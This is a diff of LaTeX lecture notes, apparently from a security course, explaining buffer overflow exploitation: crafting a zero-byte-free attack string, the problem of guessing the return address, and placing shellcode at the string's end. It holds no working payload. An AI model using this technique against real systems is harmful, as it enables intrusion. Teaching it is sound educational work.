356 |
356 |
357 \noindent This instruction does not contain any zero byte when |
357 \noindent This instruction does not contain any zero byte when |
358 encoded, but produces a zero byte on the stack. |
358 encoded, but produces a zero byte on the stack. |
359 |
359 |
360 Having removed the zero bytes we can craft the string that |
360 Having removed the zero bytes we can craft the string that |
361 will be send to our target computer. It is typically of the |
361 will be send to the target computer. It is typically of the |
362 form |
362 form |
363 |
363 |
364 \begin{center} |
364 \begin{center} |
365 \begin{tikzpicture}[scale=0.7] |
365 \begin{tikzpicture}[scale=0.7] |
366 \draw[line width=1mm] (-2, -1) rectangle (2,3); |
366 \draw[line width=1mm] (-2, -1) rectangle (2,3); |
367 \draw[line width=1mm] (-2,1.9) -- (2,1.9); |
367 \draw[line width=1mm] (-2,1.9) -- (2,1.9); |
368 \draw (0,2.5) node {\large\tt shell code}; |
368 \draw (0,2.5) node {\large\tt shell code}; |
369 \draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7); |
369 \draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7); |
370 \draw[->,line width=0.3mm] (1.05, -1) -- (1.05,-1.7) -- |
370 \draw[->,line width=0.3mm] (1.05, -1) -- (1.05,-1.7) -- |
371 (-3,-1.7) -- (-3, 3.7) -- (-1.9, 3.7) -- (-1.9, 3.1); |
371 (-3,-1.7) -- (-3, 3.7) -- (-1.9, 3.7) -- (-1.9, 3.1); |
372 \draw (-2, 3) node[anchor=north east] {\LARGE\tt "}; |
372 \draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}}; |
373 \draw ( 2,-0.9) node[anchor=west] {\LARGE\tt "}; |
373 \draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}}; |
374 \end{tikzpicture} |
374 \end{tikzpicture} |
375 \end{center} |
375 \end{center} |
376 |
376 |
|
377 \noindent This of course requires that the buffer we are |
|
378 trying to attack can at least contain the shellcode we want to |
|
379 run. But as you can see this is only 47 bytes, which is a very |
|
380 low bar to jump over. More formidable is the choice of finding |
|
381 the right address to jump to. As indicated in the picture we |
|
382 need to be very precise with the address with which we will |
|
383 overwrite the buffer. It has to be precisely the first byte of |
|
384 the shellcode. While this is easy withe the help of a |
|
385 debugger, we typically cannot run anything on the machine yet |
|
386 we target. And the address is very specific to the setup of |
|
387 the target machine. One way of finding out what the right |
|
388 address is to try out one by one until we get lucky. With |
|
389 large memories available today, however, the odds are long. |
|
390 And if we try out too many possible candidates to quickly, we |
|
391 might be detected by the system administrator of the target |
|
392 system. |
|
393 |
|
394 We can improve our odds considerably, by the following clever |
|
395 trick. Instead of adding the shellcode at the beginning of the |
|
396 string, we should add it at the end, just before we overflow |
|
397 the buffer, like |
|
398 |
|
399 \begin{center} |
|
400 \begin{tikzpicture}[scale=0.7] |
|
401 \draw[line width=1mm] (-2, -1) rectangle (2,3); |
|
402 \draw[line width=1mm] (-2,1.9) -- (2,1.9); |
|
403 \draw (0,2.5) node {\large\tt shell code}; |
|
404 \draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7); |
|
405 \draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}}; |
|
406 \draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}}; |
|
407 \end{tikzpicture} |
|
408 \end{center} |
377 |
409 |
378 \bigskip\bigskip |
410 \bigskip\bigskip |
379 \subsubsection*{A Crash-Course for GDB} |
411 \subsubsection*{A Crash-Course for GDB} |
380 |
412 |
381 \begin{itemize} |
413 \begin{itemize} |